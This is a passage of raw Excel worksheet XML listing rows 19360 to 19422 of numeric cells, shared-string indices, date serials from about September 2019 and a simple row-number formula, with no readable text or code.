    </row>
    <row r="19360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19360">
        <f t="shared" si="302"/>
        <v>19359</v>
      </c>
      <c r="B19360">
        <v>4359</v>
      </c>
      <c r="C19360" t="s">
        <v>25497</v>
      </c>
      <c r="D19360" s="1">
        <v>43731</v>
      </c>
      <c r="E19360" t="s">
        <v>25517</v>
      </c>
      <c r="F19360" t="s">
        <v>9975</v>
      </c>
      <c r="G19360" t="s">
        <v>31111</v>
      </c>
    </row>
    <row r="19361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19361">
        <f t="shared" si="302"/>
        <v>19360</v>
      </c>
      <c r="B19361">
        <v>4360</v>
      </c>
      <c r="C19361" t="s">
        <v>25497</v>
      </c>
      <c r="D19361" s="1">
        <v>43719</v>
      </c>
      <c r="E19361" t="s">
        <v>25592</v>
      </c>
      <c r="F19361" t="s">
        <v>9975</v>
      </c>
      <c r="G19361" t="s">
        <v>31112</v>
      </c>
    </row>
    <row r="19362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19362">
        <f t="shared" si="302"/>
        <v>19361</v>
      </c>
      <c r="B19362">
        <v>4361</v>
      </c>
      <c r="C19362" t="s">
        <v>25497</v>
      </c>
      <c r="D19362" s="1">
        <v>43727</v>
      </c>
      <c r="E19362" t="s">
        <v>25642</v>
      </c>
      <c r="F19362" t="s">
        <v>9975</v>
      </c>
      <c r="G19362" t="s">
        <v>31113</v>
      </c>
    </row>
    <row r="19363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19363">
        <f t="shared" si="302"/>
        <v>19362</v>
      </c>
      <c r="B19363">
        <v>4362</v>
      </c>
      <c r="C19363" t="s">
        <v>25497</v>
      </c>
      <c r="D19363" s="1">
        <v>43729</v>
      </c>
      <c r="E19363" t="s">
        <v>31114</v>
      </c>
      <c r="F19363" t="s">
        <v>9975</v>
      </c>
      <c r="G19363" t="s">
        <v>31115</v>
      </c>
    </row>
    <row r="19364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19364">
        <f t="shared" si="302"/>
        <v>19363</v>
      </c>
      <c r="B19364">
        <v>4363</v>
      </c>
      <c r="C19364" t="s">
        <v>25497</v>
      </c>
      <c r="D19364" s="1">
        <v>43738</v>
      </c>
      <c r="F19364" t="s">
        <v>9978</v>
      </c>
      <c r="G19364" t="s">
        <v>31116</v>
      </c>
    </row>
    <row r="19365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19365">
        <f t="shared" si="302"/>
        <v>19364</v>
      </c>
      <c r="B19365">
        <v>4364</v>
      </c>
      <c r="C19365" t="s">
        <v>25497</v>
      </c>
      <c r="D19365" s="1">
        <v>43728</v>
      </c>
      <c r="E19365" t="s">
        <v>31117</v>
      </c>
      <c r="F19365" t="s">
        <v>10021</v>
      </c>
      <c r="G19365" t="s">
        <v>31118</v>
      </c>
    </row>
    <row r="19366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19366">
        <f t="shared" si="302"/>
        <v>19365</v>
      </c>
      <c r="B19366">
        <v>4365</v>
      </c>
      <c r="C19366" t="s">
        <v>25497</v>
      </c>
      <c r="D19366" s="1">
        <v>43721</v>
      </c>
      <c r="E19366" t="s">
        <v>25509</v>
      </c>
      <c r="F19366" t="s">
        <v>10021</v>
      </c>
      <c r="G19366" t="s">
        <v>31119</v>
      </c>
    </row>
    <row r="19367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19367">
        <f t="shared" si="302"/>
        <v>19366</v>
      </c>
      <c r="B19367">
        <v>4366</v>
      </c>
      <c r="C19367" t="s">
        <v>25497</v>
      </c>
      <c r="D19367" s="1">
        <v>43734</v>
      </c>
      <c r="E19367" t="s">
        <v>31120</v>
      </c>
      <c r="F19367" t="s">
        <v>9975</v>
      </c>
      <c r="G19367" t="s">
        <v>31121</v>
      </c>
    </row>
    <row r="19368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19368">
        <f t="shared" si="302"/>
        <v>19367</v>
      </c>
      <c r="B19368">
        <v>4367</v>
      </c>
      <c r="C19368" t="s">
        <v>25497</v>
      </c>
      <c r="D19368" s="1">
        <v>43731</v>
      </c>
      <c r="E19368" t="s">
        <v>25592</v>
      </c>
      <c r="F19368" t="s">
        <v>9975</v>
      </c>
      <c r="G19368" t="s">
        <v>31122</v>
      </c>
    </row>
    <row r="19369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19369">
        <f t="shared" si="302"/>
        <v>19368</v>
      </c>
      <c r="B19369">
        <v>4368</v>
      </c>
      <c r="C19369" t="s">
        <v>25497</v>
      </c>
      <c r="D19369" s="1">
        <v>43721</v>
      </c>
      <c r="E19369" t="s">
        <v>31123</v>
      </c>
      <c r="F19369" t="s">
        <v>10021</v>
      </c>
      <c r="G19369" t="s">
        <v>31124</v>
      </c>
    </row>
    <row r="19370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19370">
        <f t="shared" si="302"/>
        <v>19369</v>
      </c>
      <c r="B19370">
        <v>4369</v>
      </c>
      <c r="C19370" t="s">
        <v>25497</v>
      </c>
      <c r="D19370" s="1">
        <v>43720</v>
      </c>
      <c r="E19370" t="s">
        <v>25592</v>
      </c>
      <c r="F19370" t="s">
        <v>9975</v>
      </c>
      <c r="G19370" t="s">
        <v>31125</v>
      </c>
    </row>
    <row r="19371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19371">
        <f t="shared" si="302"/>
        <v>19370</v>
      </c>
      <c r="B19371">
        <v>4370</v>
      </c>
      <c r="C19371" t="s">
        <v>25497</v>
      </c>
      <c r="D19371" s="1">
        <v>43728</v>
      </c>
      <c r="E19371" t="s">
        <v>31126</v>
      </c>
      <c r="F19371" t="s">
        <v>9975</v>
      </c>
      <c r="G19371" t="s">
        <v>31127</v>
      </c>
    </row>
    <row r="19372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19372">
        <f t="shared" si="302"/>
        <v>19371</v>
      </c>
      <c r="B19372">
        <v>4371</v>
      </c>
      <c r="C19372" t="s">
        <v>25497</v>
      </c>
      <c r="D19372" s="1">
        <v>43724</v>
      </c>
      <c r="E19372" t="s">
        <v>31128</v>
      </c>
      <c r="F19372" t="s">
        <v>9975</v>
      </c>
      <c r="G19372" t="s">
        <v>31129</v>
      </c>
    </row>
    <row r="19373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19373">
        <f t="shared" si="302"/>
        <v>19372</v>
      </c>
      <c r="B19373">
        <v>4372</v>
      </c>
      <c r="C19373" t="s">
        <v>25497</v>
      </c>
      <c r="D19373" s="1">
        <v>43731</v>
      </c>
      <c r="F19373" t="s">
        <v>9978</v>
      </c>
      <c r="G19373" t="s">
        <v>31130</v>
      </c>
    </row>
    <row r="19374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19374">
        <f t="shared" si="302"/>
        <v>19373</v>
      </c>
      <c r="B19374">
        <v>4373</v>
      </c>
      <c r="C19374" t="s">
        <v>25497</v>
      </c>
      <c r="D19374" s="1">
        <v>43738</v>
      </c>
      <c r="E19374" t="s">
        <v>25543</v>
      </c>
      <c r="F19374" t="s">
        <v>9975</v>
      </c>
      <c r="G19374" t="s">
        <v>31131</v>
      </c>
    </row>
    <row r="19375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19375">
        <f t="shared" si="302"/>
        <v>19374</v>
      </c>
      <c r="B19375">
        <v>4374</v>
      </c>
      <c r="C19375" t="s">
        <v>25497</v>
      </c>
      <c r="D19375" s="1">
        <v>43718</v>
      </c>
      <c r="F19375" t="s">
        <v>9975</v>
      </c>
      <c r="G19375" t="s">
        <v>31132</v>
      </c>
    </row>
    <row r="19376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19376">
        <f t="shared" si="302"/>
        <v>19375</v>
      </c>
      <c r="B19376">
        <v>4375</v>
      </c>
      <c r="C19376" t="s">
        <v>25497</v>
      </c>
      <c r="D19376" s="1">
        <v>43718</v>
      </c>
      <c r="F19376" t="s">
        <v>9975</v>
      </c>
      <c r="G19376" t="s">
        <v>31133</v>
      </c>
    </row>
    <row r="19377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19377">
        <f t="shared" si="302"/>
        <v>19376</v>
      </c>
      <c r="B19377">
        <v>4376</v>
      </c>
      <c r="C19377" t="s">
        <v>25497</v>
      </c>
      <c r="D19377" s="1">
        <v>43735</v>
      </c>
      <c r="E19377" t="s">
        <v>25509</v>
      </c>
      <c r="F19377" t="s">
        <v>10021</v>
      </c>
      <c r="G19377" t="s">
        <v>31134</v>
      </c>
    </row>
    <row r="19378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19378">
        <f t="shared" si="302"/>
        <v>19377</v>
      </c>
      <c r="B19378">
        <v>4377</v>
      </c>
      <c r="C19378" t="s">
        <v>25497</v>
      </c>
      <c r="D19378" s="1">
        <v>43726</v>
      </c>
      <c r="E19378" t="s">
        <v>27072</v>
      </c>
      <c r="F19378" t="s">
        <v>9975</v>
      </c>
      <c r="G19378" t="s">
        <v>31135</v>
      </c>
    </row>
    <row r="19379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19379">
        <f t="shared" si="302"/>
        <v>19378</v>
      </c>
      <c r="B19379">
        <v>4378</v>
      </c>
      <c r="C19379" t="s">
        <v>25497</v>
      </c>
      <c r="D19379" s="1">
        <v>43721</v>
      </c>
      <c r="E19379" t="s">
        <v>25517</v>
      </c>
      <c r="F19379" t="s">
        <v>9975</v>
      </c>
      <c r="G19379" t="s">
        <v>31136</v>
      </c>
    </row>
    <row r="19380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19380">
        <f t="shared" si="302"/>
        <v>19379</v>
      </c>
      <c r="B19380">
        <v>4379</v>
      </c>
      <c r="C19380" t="s">
        <v>25497</v>
      </c>
      <c r="D19380" s="1">
        <v>43721</v>
      </c>
      <c r="E19380" t="s">
        <v>25584</v>
      </c>
      <c r="F19380" t="s">
        <v>9975</v>
      </c>
      <c r="G19380" t="s">
        <v>31137</v>
      </c>
    </row>
    <row r="19381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19381">
        <f t="shared" si="302"/>
        <v>19380</v>
      </c>
      <c r="B19381">
        <v>4380</v>
      </c>
      <c r="C19381" t="s">
        <v>25497</v>
      </c>
      <c r="D19381" s="1">
        <v>43724</v>
      </c>
      <c r="E19381" t="s">
        <v>31138</v>
      </c>
      <c r="F19381" t="s">
        <v>9978</v>
      </c>
      <c r="G19381" t="s">
        <v>31139</v>
      </c>
    </row>
    <row r="19382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19382">
        <f t="shared" si="302"/>
        <v>19381</v>
      </c>
      <c r="B19382">
        <v>4381</v>
      </c>
      <c r="C19382" t="s">
        <v>25497</v>
      </c>
      <c r="D19382" s="1">
        <v>43727</v>
      </c>
      <c r="F19382" t="s">
        <v>9975</v>
      </c>
      <c r="G19382" t="s">
        <v>31140</v>
      </c>
    </row>
    <row r="19383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19383">
        <f t="shared" si="302"/>
        <v>19382</v>
      </c>
      <c r="B19383">
        <v>4382</v>
      </c>
      <c r="C19383" t="s">
        <v>25497</v>
      </c>
      <c r="D19383" s="1">
        <v>43735</v>
      </c>
      <c r="F19383" t="s">
        <v>10021</v>
      </c>
      <c r="G19383" t="s">
        <v>31141</v>
      </c>
    </row>
    <row r="19384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19384">
        <f t="shared" si="302"/>
        <v>19383</v>
      </c>
      <c r="B19384">
        <v>4383</v>
      </c>
      <c r="C19384" t="s">
        <v>25497</v>
      </c>
      <c r="D19384" s="1">
        <v>43722</v>
      </c>
      <c r="E19384" t="s">
        <v>31142</v>
      </c>
      <c r="F19384" t="s">
        <v>9975</v>
      </c>
      <c r="G19384" t="s">
        <v>31143</v>
      </c>
    </row>
    <row r="19385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19385">
        <f t="shared" si="302"/>
        <v>19384</v>
      </c>
      <c r="B19385">
        <v>4384</v>
      </c>
      <c r="C19385" t="s">
        <v>25497</v>
      </c>
      <c r="D19385" s="1">
        <v>43712</v>
      </c>
      <c r="E19385" t="s">
        <v>25509</v>
      </c>
      <c r="F19385" t="s">
        <v>10021</v>
      </c>
      <c r="G19385" t="s">
        <v>31144</v>
      </c>
    </row>
    <row r="19386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19386">
        <f t="shared" si="302"/>
        <v>19385</v>
      </c>
      <c r="B19386">
        <v>4385</v>
      </c>
      <c r="C19386" t="s">
        <v>25497</v>
      </c>
      <c r="D19386" s="1">
        <v>43721</v>
      </c>
      <c r="E19386" t="s">
        <v>25502</v>
      </c>
      <c r="F19386" t="s">
        <v>9975</v>
      </c>
      <c r="G19386" t="s">
        <v>31145</v>
      </c>
    </row>
    <row r="19387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19387">
        <f t="shared" si="302"/>
        <v>19386</v>
      </c>
      <c r="B19387">
        <v>4386</v>
      </c>
      <c r="C19387" t="s">
        <v>25497</v>
      </c>
      <c r="D19387" s="1">
        <v>43711</v>
      </c>
      <c r="E19387" t="s">
        <v>25509</v>
      </c>
      <c r="F19387" t="s">
        <v>10021</v>
      </c>
      <c r="G19387" t="s">
        <v>31146</v>
      </c>
    </row>
    <row r="19388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19388">
        <f t="shared" si="302"/>
        <v>19387</v>
      </c>
      <c r="B19388">
        <v>4387</v>
      </c>
      <c r="C19388" t="s">
        <v>25497</v>
      </c>
      <c r="D19388" s="1">
        <v>43716</v>
      </c>
      <c r="E19388" t="s">
        <v>25642</v>
      </c>
      <c r="F19388" t="s">
        <v>9975</v>
      </c>
      <c r="G19388" t="s">
        <v>31147</v>
      </c>
    </row>
    <row r="19389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19389">
        <f t="shared" si="302"/>
        <v>19388</v>
      </c>
      <c r="B19389">
        <v>4388</v>
      </c>
      <c r="C19389" t="s">
        <v>25497</v>
      </c>
      <c r="D19389" s="1">
        <v>43735</v>
      </c>
      <c r="F19389" t="s">
        <v>9975</v>
      </c>
      <c r="G19389" t="s">
        <v>31148</v>
      </c>
    </row>
    <row r="19390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19390">
        <f t="shared" si="302"/>
        <v>19389</v>
      </c>
      <c r="B19390">
        <v>4389</v>
      </c>
      <c r="C19390" t="s">
        <v>25497</v>
      </c>
      <c r="D19390" s="1">
        <v>43728</v>
      </c>
      <c r="E19390" t="s">
        <v>25584</v>
      </c>
      <c r="F19390" t="s">
        <v>9975</v>
      </c>
      <c r="G19390" t="s">
        <v>31149</v>
      </c>
    </row>
    <row r="19391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19391">
        <f t="shared" si="302"/>
        <v>19390</v>
      </c>
      <c r="B19391">
        <v>4390</v>
      </c>
      <c r="C19391" t="s">
        <v>25497</v>
      </c>
      <c r="D19391" s="1">
        <v>43725</v>
      </c>
      <c r="E19391" t="s">
        <v>31150</v>
      </c>
      <c r="F19391" t="s">
        <v>9978</v>
      </c>
      <c r="G19391" t="s">
        <v>31151</v>
      </c>
    </row>
    <row r="19392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19392">
        <f t="shared" si="302"/>
        <v>19391</v>
      </c>
      <c r="B19392">
        <v>4391</v>
      </c>
      <c r="C19392" t="s">
        <v>25497</v>
      </c>
      <c r="D19392" s="1">
        <v>43733</v>
      </c>
      <c r="F19392" t="s">
        <v>9975</v>
      </c>
      <c r="G19392" t="s">
        <v>31152</v>
      </c>
    </row>
    <row r="19393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19393">
        <f t="shared" si="302"/>
        <v>19392</v>
      </c>
      <c r="B19393">
        <v>4392</v>
      </c>
      <c r="C19393" t="s">
        <v>25497</v>
      </c>
      <c r="D19393" s="1">
        <v>43727</v>
      </c>
      <c r="F19393" t="s">
        <v>9978</v>
      </c>
      <c r="G19393" t="s">
        <v>31153</v>
      </c>
    </row>
    <row r="19394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19394">
        <f t="shared" si="302"/>
        <v>19393</v>
      </c>
      <c r="B19394">
        <v>4393</v>
      </c>
      <c r="C19394" t="s">
        <v>25497</v>
      </c>
      <c r="D19394" s="1">
        <v>43726</v>
      </c>
      <c r="F19394" t="s">
        <v>9975</v>
      </c>
      <c r="G19394" t="s">
        <v>31154</v>
      </c>
    </row>
    <row r="19395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19395">
        <f t="shared" ref="A19395:A19458" si="303">+ROW(A19394)</f>
        <v>19394</v>
      </c>
      <c r="B19395">
        <v>4394</v>
      </c>
      <c r="C19395" t="s">
        <v>25497</v>
      </c>
      <c r="D19395" s="1">
        <v>43717</v>
      </c>
      <c r="F19395" t="s">
        <v>10526</v>
      </c>
      <c r="G19395" t="s">
        <v>31155</v>
      </c>
    </row>
    <row r="19396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19396">
        <f t="shared" si="303"/>
        <v>19395</v>
      </c>
      <c r="B19396">
        <v>4395</v>
      </c>
      <c r="C19396" t="s">
        <v>25497</v>
      </c>
      <c r="D19396" s="1">
        <v>43734</v>
      </c>
      <c r="E19396" t="s">
        <v>25592</v>
      </c>
      <c r="F19396" t="s">
        <v>9975</v>
      </c>
      <c r="G19396" t="s">
        <v>31156</v>
      </c>
    </row>
    <row r="19397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19397">
        <f t="shared" si="303"/>
        <v>19396</v>
      </c>
      <c r="B19397">
        <v>4396</v>
      </c>
      <c r="C19397" t="s">
        <v>25497</v>
      </c>
      <c r="D19397" s="1">
        <v>43728</v>
      </c>
      <c r="E19397" t="s">
        <v>25512</v>
      </c>
      <c r="F19397" t="s">
        <v>9975</v>
      </c>
      <c r="G19397" t="s">
        <v>31157</v>
      </c>
    </row>
    <row r="19398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19398">
        <f t="shared" si="303"/>
        <v>19397</v>
      </c>
      <c r="B19398">
        <v>4397</v>
      </c>
      <c r="C19398" t="s">
        <v>25497</v>
      </c>
      <c r="D19398" s="1">
        <v>43728</v>
      </c>
      <c r="E19398" t="s">
        <v>31158</v>
      </c>
      <c r="F19398" t="s">
        <v>9975</v>
      </c>
      <c r="G19398" t="s">
        <v>31159</v>
      </c>
    </row>
    <row r="19399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19399">
        <f t="shared" si="303"/>
        <v>19398</v>
      </c>
      <c r="B19399">
        <v>4398</v>
      </c>
      <c r="C19399" t="s">
        <v>25497</v>
      </c>
      <c r="D19399" s="1">
        <v>43719</v>
      </c>
      <c r="E19399" t="s">
        <v>25543</v>
      </c>
      <c r="F19399" t="s">
        <v>9975</v>
      </c>
      <c r="G19399" t="s">
        <v>31160</v>
      </c>
    </row>
    <row r="19400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19400">
        <f t="shared" si="303"/>
        <v>19399</v>
      </c>
      <c r="B19400">
        <v>4399</v>
      </c>
      <c r="C19400" t="s">
        <v>25497</v>
      </c>
      <c r="D19400" s="1">
        <v>43713</v>
      </c>
      <c r="F19400" t="s">
        <v>9975</v>
      </c>
      <c r="G19400" t="s">
        <v>31161</v>
      </c>
    </row>
    <row r="19401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19401">
        <f t="shared" si="303"/>
        <v>19400</v>
      </c>
      <c r="B19401">
        <v>4400</v>
      </c>
      <c r="C19401" t="s">
        <v>25497</v>
      </c>
      <c r="D19401" s="1">
        <v>43711</v>
      </c>
      <c r="F19401" t="s">
        <v>9975</v>
      </c>
      <c r="G19401" t="s">
        <v>31162</v>
      </c>
    </row>
    <row r="19402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19402">
        <f t="shared" si="303"/>
        <v>19401</v>
      </c>
      <c r="B19402">
        <v>4401</v>
      </c>
      <c r="C19402" t="s">
        <v>25497</v>
      </c>
      <c r="D19402" s="1">
        <v>43727</v>
      </c>
      <c r="F19402" t="s">
        <v>9975</v>
      </c>
      <c r="G19402" t="s">
        <v>31163</v>
      </c>
    </row>
    <row r="19403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19403">
        <f t="shared" si="303"/>
        <v>19402</v>
      </c>
      <c r="B19403">
        <v>4402</v>
      </c>
      <c r="C19403" t="s">
        <v>25497</v>
      </c>
      <c r="D19403" s="1">
        <v>43710</v>
      </c>
      <c r="E19403" t="s">
        <v>31164</v>
      </c>
      <c r="F19403" t="s">
        <v>9975</v>
      </c>
      <c r="G19403" t="s">
        <v>31165</v>
      </c>
    </row>
    <row r="19404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19404">
        <f t="shared" si="303"/>
        <v>19403</v>
      </c>
      <c r="B19404">
        <v>4403</v>
      </c>
      <c r="C19404" t="s">
        <v>25497</v>
      </c>
      <c r="D19404" s="1">
        <v>43731</v>
      </c>
      <c r="E19404" t="s">
        <v>31166</v>
      </c>
      <c r="F19404" t="s">
        <v>9975</v>
      </c>
      <c r="G19404" t="s">
        <v>31167</v>
      </c>
    </row>
    <row r="19405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19405">
        <f t="shared" si="303"/>
        <v>19404</v>
      </c>
      <c r="B19405">
        <v>4404</v>
      </c>
      <c r="C19405" t="s">
        <v>25497</v>
      </c>
      <c r="D19405" s="1">
        <v>43724</v>
      </c>
      <c r="F19405" t="s">
        <v>9975</v>
      </c>
      <c r="G19405" t="s">
        <v>31168</v>
      </c>
    </row>
    <row r="19406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19406">
        <f t="shared" si="303"/>
        <v>19405</v>
      </c>
      <c r="B19406">
        <v>4405</v>
      </c>
      <c r="C19406" t="s">
        <v>25497</v>
      </c>
      <c r="D19406" s="1">
        <v>43724</v>
      </c>
      <c r="F19406" t="s">
        <v>9978</v>
      </c>
      <c r="G19406" t="s">
        <v>31169</v>
      </c>
    </row>
    <row r="19407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19407">
        <f t="shared" si="303"/>
        <v>19406</v>
      </c>
      <c r="B19407">
        <v>4406</v>
      </c>
      <c r="C19407" t="s">
        <v>25497</v>
      </c>
      <c r="D19407" s="1">
        <v>43721</v>
      </c>
      <c r="F19407" t="s">
        <v>9975</v>
      </c>
      <c r="G19407" t="s">
        <v>31170</v>
      </c>
    </row>
    <row r="19408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19408">
        <f t="shared" si="303"/>
        <v>19407</v>
      </c>
      <c r="B19408">
        <v>4407</v>
      </c>
      <c r="C19408" t="s">
        <v>25497</v>
      </c>
      <c r="D19408" s="1">
        <v>43731</v>
      </c>
      <c r="E19408" t="s">
        <v>29994</v>
      </c>
      <c r="F19408" t="s">
        <v>9975</v>
      </c>
      <c r="G19408" t="s">
        <v>31171</v>
      </c>
    </row>
    <row r="19409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19409">
        <f t="shared" si="303"/>
        <v>19408</v>
      </c>
      <c r="B19409">
        <v>4408</v>
      </c>
      <c r="C19409" t="s">
        <v>25497</v>
      </c>
      <c r="D19409" s="1">
        <v>43735</v>
      </c>
      <c r="E19409" t="s">
        <v>31047</v>
      </c>
      <c r="F19409" t="s">
        <v>9978</v>
      </c>
      <c r="G19409" t="s">
        <v>31172</v>
      </c>
    </row>
    <row r="19410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19410">
        <f t="shared" si="303"/>
        <v>19409</v>
      </c>
      <c r="B19410">
        <v>4409</v>
      </c>
      <c r="C19410" t="s">
        <v>25497</v>
      </c>
      <c r="D19410" s="1">
        <v>43720</v>
      </c>
      <c r="E19410" t="s">
        <v>25538</v>
      </c>
      <c r="F19410" t="s">
        <v>9975</v>
      </c>
      <c r="G19410" t="s">
        <v>31173</v>
      </c>
    </row>
    <row r="19411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19411">
        <f t="shared" si="303"/>
        <v>19410</v>
      </c>
      <c r="B19411">
        <v>4410</v>
      </c>
      <c r="C19411" t="s">
        <v>25497</v>
      </c>
      <c r="D19411" s="1">
        <v>43732</v>
      </c>
      <c r="F19411" t="s">
        <v>9975</v>
      </c>
      <c r="G19411" t="s">
        <v>31174</v>
      </c>
    </row>
    <row r="19412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19412">
        <f t="shared" si="303"/>
        <v>19411</v>
      </c>
      <c r="B19412">
        <v>4411</v>
      </c>
      <c r="C19412" t="s">
        <v>25497</v>
      </c>
      <c r="D19412" s="1">
        <v>43724</v>
      </c>
      <c r="E19412" t="s">
        <v>31175</v>
      </c>
      <c r="F19412" t="s">
        <v>9975</v>
      </c>
      <c r="G19412" t="s">
        <v>31176</v>
      </c>
    </row>
    <row r="19413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19413">
        <f t="shared" si="303"/>
        <v>19412</v>
      </c>
      <c r="B19413">
        <v>4412</v>
      </c>
      <c r="C19413" t="s">
        <v>25497</v>
      </c>
      <c r="D19413" s="1">
        <v>43718</v>
      </c>
      <c r="F19413" t="s">
        <v>9975</v>
      </c>
      <c r="G19413" t="s">
        <v>31177</v>
      </c>
    </row>
    <row r="19414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19414">
        <f t="shared" si="303"/>
        <v>19413</v>
      </c>
      <c r="B19414">
        <v>4413</v>
      </c>
      <c r="C19414" t="s">
        <v>25497</v>
      </c>
      <c r="D19414" s="1">
        <v>43738</v>
      </c>
      <c r="E19414" t="s">
        <v>25592</v>
      </c>
      <c r="F19414" t="s">
        <v>9975</v>
      </c>
      <c r="G19414" t="s">
        <v>31178</v>
      </c>
    </row>
    <row r="19415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19415">
        <f t="shared" si="303"/>
        <v>19414</v>
      </c>
      <c r="B19415">
        <v>4414</v>
      </c>
      <c r="C19415" t="s">
        <v>25497</v>
      </c>
      <c r="D19415" s="1">
        <v>43725</v>
      </c>
      <c r="F19415" t="s">
        <v>9975</v>
      </c>
      <c r="G19415" t="s">
        <v>31179</v>
      </c>
    </row>
    <row r="19416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19416">
        <f t="shared" si="303"/>
        <v>19415</v>
      </c>
      <c r="B19416">
        <v>4415</v>
      </c>
      <c r="C19416" t="s">
        <v>25497</v>
      </c>
      <c r="D19416" s="1">
        <v>43718</v>
      </c>
      <c r="E19416" t="s">
        <v>25642</v>
      </c>
      <c r="F19416" t="s">
        <v>9975</v>
      </c>
      <c r="G19416" t="s">
        <v>31180</v>
      </c>
    </row>
    <row r="19417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19417">
        <f t="shared" si="303"/>
        <v>19416</v>
      </c>
      <c r="B19417">
        <v>4416</v>
      </c>
      <c r="C19417" t="s">
        <v>25497</v>
      </c>
      <c r="D19417" s="1">
        <v>43738</v>
      </c>
      <c r="F19417" t="s">
        <v>9975</v>
      </c>
      <c r="G19417" t="s">
        <v>31181</v>
      </c>
    </row>
    <row r="19418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19418">
        <f t="shared" si="303"/>
        <v>19417</v>
      </c>
      <c r="B19418">
        <v>4417</v>
      </c>
      <c r="C19418" t="s">
        <v>25497</v>
      </c>
      <c r="D19418" s="1">
        <v>43732</v>
      </c>
      <c r="E19418" t="s">
        <v>31182</v>
      </c>
      <c r="F19418" t="s">
        <v>10526</v>
      </c>
      <c r="G19418" t="s">
        <v>31183</v>
      </c>
    </row>
    <row r="19419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19419">
        <f t="shared" si="303"/>
        <v>19418</v>
      </c>
      <c r="B19419">
        <v>4418</v>
      </c>
      <c r="C19419" t="s">
        <v>25497</v>
      </c>
      <c r="D19419" s="1">
        <v>43738</v>
      </c>
      <c r="E19419" t="s">
        <v>31184</v>
      </c>
      <c r="F19419" t="s">
        <v>9975</v>
      </c>
      <c r="G19419" t="s">
        <v>31185</v>
      </c>
    </row>
    <row r="19420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19420">
        <f t="shared" si="303"/>
        <v>19419</v>
      </c>
      <c r="B19420">
        <v>4419</v>
      </c>
      <c r="C19420" t="s">
        <v>25497</v>
      </c>
      <c r="D19420" s="1">
        <v>43728</v>
      </c>
      <c r="E19420" t="s">
        <v>25517</v>
      </c>
      <c r="F19420" t="s">
        <v>9975</v>
      </c>
      <c r="G19420" t="s">
        <v>31186</v>
      </c>
    </row>
    <row r="19421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19421">
        <f t="shared" si="303"/>
        <v>19420</v>
      </c>
      <c r="B19421">
        <v>4420</v>
      </c>
      <c r="C19421" t="s">
        <v>25497</v>
      </c>
      <c r="D19421" s="1">
        <v>43734</v>
      </c>
      <c r="E19421" t="s">
        <v>31187</v>
      </c>
      <c r="F19421" t="s">
        <v>9975</v>
      </c>
      <c r="G19421" t="s">
        <v>31188</v>
      </c>
    </row>
    <row r="19422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19422">
        <f t="shared" si="303"/>
        <v>19421</v>
      </c>
      <c r="B19422">
        <v>4421</v>
      </c>
      <c r="C19422" t="s">
        <v>25497</v>
      </c>
      <c r="D19422" s="1">
        <v>43725</v>
      </c>
      <c r="E19422" t="s">
        <v>31189</v>
      </c>
      <c r="F19422" t="s">
        <v>10526</v>
      </c>
      <c r="G19422" t="s">
        <v>31190</v>
      </c>
    </row>
    <row r="19423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19423">
        <f t="shared" si="303"/>
        <v>19422</v>
      </c>
      <c r="B19423">
